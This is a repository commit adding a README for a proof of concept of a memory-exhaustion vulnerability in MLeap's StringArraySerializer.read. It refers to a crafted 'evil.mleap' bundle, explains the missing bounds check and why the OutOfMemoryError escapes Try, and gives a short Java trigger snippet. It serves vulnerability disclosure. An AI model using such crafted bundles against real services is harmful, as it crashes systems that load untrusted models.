wulonchia commited on
Commit
2007fbc
·
verified ·
1 Parent(s): 4fc639b

Upload README.md with huggingface_hub

Browse files
Files changed (1) hide show
  1. README.md +25 -0
README.md ADDED
@@ -0,0 +1,25 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # MLeap StringArraySerializer OOM PoC
2
+
3
+ Proof-of-concept for an uncontrolled resource consumption vulnerability in MLeap's `StringArraySerializer.read`.
4
+
5
+ ## Files
6
+ - `evil.mleap`: crafted MLeap bundle ZIP. Loading it triggers `OutOfMemoryError` via `new Array[Byte](0x7FFFFFFF)` in `StringArraySerializer.read`.
7
+
8
+ ## Reproduce
9
+ ```python
10
+ import struct, zipfile, io, base64
11
+ from mleap.pyspark.spark_support import SimpleSparkSerializer
12
+ # Or load via BundleFile in Scala/Java:
13
+ # BundleFile.load("evil.mleap")
14
+ ```
15
+
16
+ ## Root Cause
17
+ `StringArraySerializer.read` calls `din.readInt()` on attacker-controlled bytes and passes the result directly to `new Array[Byte](size)` with no bounds check. `OutOfMemoryError` extends `VirtualMachineError`; Scala's `NonFatal` extractor returns false for it, so the surrounding `Try{}` does not catch it — the error propagates and crashes the process.
18
+
19
+ ## Trigger (Java)
20
+ ```java
21
+ DataInputStream din = new DataInputStream(
22
+ new ByteArrayInputStream(new byte[]{0x7F,(byte)0xFF,(byte)0xFF,(byte)0xFF}));
23
+ int size = din.readInt(); // 2147483647
24
+ byte[] bytes = new byte[size]; // OutOfMemoryError: Requested array size exceeds VM limit
25
+ ```